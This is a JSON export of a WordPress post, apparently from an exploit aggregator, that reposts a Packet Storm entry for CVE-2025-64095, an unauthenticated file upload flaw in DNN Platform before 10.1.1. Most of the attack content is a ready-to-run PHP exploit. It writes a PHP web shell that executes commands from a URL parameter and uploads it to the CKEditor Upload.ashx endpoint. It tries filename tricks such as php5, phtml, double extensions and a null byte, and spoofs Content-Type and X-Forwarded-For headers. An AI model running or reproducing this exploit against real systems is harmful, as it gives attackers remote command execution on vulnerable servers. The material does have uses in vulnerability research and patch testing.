{"id":29327,"date":"2025-12-08T10:42:45","date_gmt":"2025-12-08T10:42:45","guid":{"rendered":"http:\/\/localhost\/?p=29327"},"modified":"2025-12-08T10:42:45","modified_gmt":"2025-12-08T10:42:45","slug":"dnn-platform-pre1011-arbitrary-file-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29327","title":{"rendered":"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-08T16:29:45&#8243;,&#8221;description&#8221;:&#8221;DNN Platform version Pre\u201110.1.1 suffers from an unauthenticated arbitrary file upload vulnerability. This software was formerly known as DotNetNuke&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212536&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64095&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : DNN Platform Pre\u201110.1.1 Versions Unauthenticated Arbitrary File Upload                                                      |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/dnncommunity.org\/                                                                                                   |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/211134\/ \\u0026  \\tCVE-2025-64095\\n    \\n    [+] Summary : a vulnerability affecting DNN Platform (formerly DotNetNuke).Versions prior to 10.1.1 allow unauthenticated arbitrary file upload through the default HTML editor upload endpoint.\\n                 Missing permission checks in the file upload controller allowed attackers to upload files without authentication, and in some cases overwrite existing files.\\n    \\n    [+] An attacker could:\\n    \\n    Upload arbitrary files\\n    Inject malicious content\\n    Execute scripts depending on server configuration\\n    \\n    [+] Vulnerable Versions :\\n    \\n    All versions before 10.1.1 (e.g., 10.1.0, 10.0.x, 9.x, etc.)\\n    \\t\\t\\t  \\n    [+]  POC :   * Usage: Save this file as: exploit.php\\n                                    Run: php exploit.php\\n    \\t\\t\\t\\t\\t\\t\\t\\t\\n                  \\u003c?php\\n    \/*\\n        PoC for CVE-2025-64095 &#8211; Unauthenticated File Upload\\n        Author: Indoushka\\n    *\/\\n    \\n    $target = \\&#8221;http:\/\/victim.com\/Providers\/HtmlEditorProviders\/DNNConnect.CKE\/Upload.ashx\\&#8221;;\\n    $file_to_upload = \\&#8221;shell.php\\&#8221;;\\n    \\n    \/\/ \u0645\u062d\u062a\u0648\u0649 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0630\u064a \u0633\u064a\u062a\u0645 \u0631\u0641\u0639\u0647 (\u0634\u0644 PHP \u0628\u0633\u064a\u0637)\\n    $php_shell = &#8216;\\u003c?php\\n    if(isset($_GET[\\&#8221;cmd\\&#8221;])) {\\n        system($_GET[\\&#8221;cmd\\&#8221;]);\\n    } else {\\n        echo \\&#8221;Shell Active &#8211; \\&#8221; . gethostname();\\n    }\\n    ?\\u003e&#8217;;\\n    \\n    file_put_contents($file_to_upload, $php_shell);\\n    \\n    \/\/ \u0645\u062d\u0627\u0648\u0644\u0627\u062a \u0644\u0623\u0633\u0645\u0627\u0621 \u0645\u0644\u0641\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u0629 \u0644\u062a\u062c\u0627\u0648\u0632 \u0627\u0644\u062d\u0645\u0627\u064a\u0629\\n    $filenames = [\\n        \\&#8221;shell.php\\&#8221;,\\n        \\&#8221;shell.php5\\&#8221;,\\n        \\&#8221;shell.phtml\\&#8221;,\\n        \\&#8221;shell.php.test\\&#8221;,\\n        \\&#8221;shell.php.jpg\\&#8221;,  \/\/ \u0642\u062f \u064a\u062a\u0645 \u062a\u062c\u0627\u0647\u0644 \u0627\u0644\u0627\u0645\u062a\u062f\u0627\u062f \u0627\u0644\u062b\u0627\u0646\u064a \u0641\u064a \u0628\u0639\u0636 \u0627\u0644\u0623\u0646\u0638\u0645\u0629\\n        \\&#8221;shell.php%00.jpg\\&#8221;, \/\/ null byte injection (\u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0646\u0638\u0627\u0645 \u0645\u0639\u0631\u0636)\\n        \\&#8221;shell.php;.jpg\\&#8221;,\\n        \\&#8221;shell.php \\&#8221;,\\n    ];\\n    \\n    foreach ($filenames as $filename) {\\n        echo \\&#8221;\\\\n[+] Trying filename: $filename\\\\n\\&#8221;;\\n        \\n        \/\/ \u0627\u0639\u062f\u0627\u062f \u0627\u0644\u0637\u0644\u0628\\n        $boundary = \\&#8221;&#8212;-Indoushka\\&#8221; . md5(time() . rand(1, 1000));\\n        $post_data  = \\&#8221;&#8211;$boundary\\\\r\\\\n\\&#8221;;\\n        $post_data .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;upload\\\\\\&#8221;; filename=\\\\\\&#8221;$filename\\\\\\&#8221;\\\\r\\\\n\\&#8221;;\\n        $post_data .= \\&#8221;Content-Type: text\/plain\\\\r\\\\n\\\\r\\\\n\\&#8221;; \/\/ \u0642\u062f \u062a\u062d\u062a\u0627\u062c \u0644\u062a\u063a\u064a\u064a\u0631 Content-Type\\n        $post_data .= $php_shell . \\&#8221;\\\\r\\\\n\\&#8221;;\\n        $post_data .= \\&#8221;&#8211;$boundary&#8211;\\\\r\\\\n\\&#8221;;\\n    \\n        \/\/ \u0627\u0631\u0633\u0627\u0644 \u0627\u0644\u0637\u0644\u0628\\n        $ch = curl_init();\\n        curl_setopt($ch, CURLOPT_URL, $target);\\n        curl_setopt($ch, CURLOPT_POST, true);\\n        curl_setopt($ch, CURLOPT_HTTPHEADER, array(\\n            \\&#8221;Content-Type: multipart\/form-data; boundary=$boundary\\&#8221;,\\n            \\&#8221;User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\&#8221;,\\n            \\&#8221;X-Forwarded-For: 127.0.0.1\\&#8221;\\n        ));\\n        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);\\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\\n        curl_setopt($ch, CURLOPT_TIMEOUT, 10);\\n        \\n        \/\/ \u0625\u0636\u0627\u0641\u0629 \u0628\u0631\u0648\u0643\u0633\u064a \u0644\u0644\u062a\u0635\u062d\u064a\u062d (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n        \/\/ curl_setopt($ch, CURLOPT_PROXY, \\&#8221;127.0.0.1:8080\\&#8221;);\\n        \\n        $response = curl_exec($ch);\\n        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n        \\n        if($response === false){\\n            echo \\&#8221;Error: \\&#8221; . curl_error($ch) . \\&#8221;\\\\n\\&#8221;;\\n        } else {\\n            echo \\&#8221;[+] HTTP Code: $http_code\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Response (first 500 chars):\\\\n\\&#8221; . substr($response, 0, 500) . \\&#8221;\\\\n\\&#8221;;\\n            \\n            \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0645\u0624\u0634\u0631\u0627\u062a \u0639\u0644\u0649 \u0646\u062c\u0627\u062d \u0627\u0644\u0631\u0641\u0639\\n            if (strpos($response, &#8216;success&#8217;) !== false || \\n                strpos($response, &#8216;url&#8217;) !== false ||\\n                strpos($response, &#8216;.php&#8217;) !== false) {\\n                echo \\&#8221;[!] Possible successful upload detected!\\\\n\\&#8221;;\\n                \\n                \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0645\u0631\u0641\u0648\u0639\\n                preg_match_all(&#8216;\/\\&#8221;(http[^\\&#8221;]+\\\\.php[^\\&#8221;]*)\\&#8221;\/i&#8217;, $response, $matches);\\n                if (!empty($matches[1])) {\\n                    echo \\&#8221;[+] Found potential shell URLs:\\\\n\\&#8221;;\\n                    foreach ($matches[1] as $url) {\\n                        echo \\&#8221;    &#8211; $url\\\\n\\&#8221;;\\n                    }\\n                }\\n            }\\n        }\\n        \\n        curl_close($ch);\\n        sleep(1); \/\/ \u062a\u062c\u0646\u0628 rate limiting\\n    }\\n    \\n    \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0628\u0631\u0641\u0639 \u0645\u0639 Content-Type \u0645\u062e\u062a\u0644\u0641\\n    echo \\&#8221;\\\\n[+] Trying with different Content-Type&#8230;\\\\n\\&#8221;;\\n    $boundary = \\&#8221;&#8212;-Indoushka\\&#8221; . md5(time());\\n    $post_data  = \\&#8221;&#8211;$boundary\\\\r\\\\n\\&#8221;;\\n    $post_data .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;upload\\\\\\&#8221;; filename=\\\\\\&#8221;shell.php\\\\\\&#8221;\\\\r\\\\n\\&#8221;;\\n    $post_data .= \\&#8221;Content-Type: image\/jpeg\\\\r\\\\n\\\\r\\\\n\\&#8221;; \/\/ Content-Type \u0645\u0636\u0644\u0644\\n    $post_data .= $php_shell . \\&#8221;\\\\r\\\\n\\&#8221;;\\n    $post_data .= \\&#8221;&#8211;$boundary&#8211;\\\\r\\\\n\\&#8221;;\\n    \\n    $ch = curl_init();\\n    curl_setopt($ch, CURLOPT_URL, $target);\\n    curl_setopt($ch, CURLOPT_POST, true);\\n    curl_setopt($ch, CURLOPT_HTTPHEADER, array(\\n        \\&#8221;Content-Type: multipart\/form-data; boundary=$boundary\\&#8221;\\n    ));\\n    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);\\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n    \\n    $response = curl_exec($ch);\\n    echo \\&#8221;[+] Response with fake Content-Type: \\&#8221; . substr($response, 0, 300) . \\&#8221;\\\\n\\&#8221;;\\n    curl_close($ch);\\n    \\n    \/\/ \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0645\u062d\u0644\u064a\\n    if (file_exists($file_to_upload)) {\\n        unlink($file_to_upload);\\n    }\\n    \\n    echo \\&#8221;\\\\n[!] Remember: Use only on systems you own or have permission to test!\\\\n\\&#8221;;\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212536&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212536\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-08T16:29:45&#8243;,&#8221;description&#8221;:&#8221;DNN Platform version Pre\u201110.1.1 suffers from an unauthenticated arbitrary file upload vulnerability. This software was formerly known as DotNetNuke&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212536&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64095&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-29327","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29327\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-08T16:29:45&#8243;,&#8221;description&#8221;:&#8221;DNN Platform version Pre\u201110.1.1 suffers from an unauthenticated arbitrary file upload vulnerability. This software was formerly known as DotNetNuke&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212536&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64095&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29327\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-08T10:42:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29327#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29327\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536\",\"datePublished\":\"2025-12-08T10:42:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29327\"},\"wordCount\":846,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29327#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29327\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29327\",\"name\":\"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-08T10:42:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29327#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29327\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29327#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29327","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-08T16:29:45&#8243;,&#8221;description&#8221;:&#8221;DNN Platform version Pre\u201110.1.1 suffers from an unauthenticated arbitrary file upload vulnerability. This software was formerly known as DotNetNuke&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212536&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64095&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n...","og_url":"https:\/\/zero.redgem.net\/?p=29327","og_site_name":"zero redgem","article_published_time":"2025-12-08T10:42:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29327#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29327"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536","datePublished":"2025-12-08T10:42:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29327"},"wordCount":846,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29327#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29327","url":"https:\/\/zero.redgem.net\/?p=29327","name":"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-08T10:42:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29327#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29327"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29327#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 DNN Platform Pre\u201110.1.1 Arbitrary File Upload_PACKETSTORM:212536"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29327","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29327"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29327\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29327"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29327"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29327"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}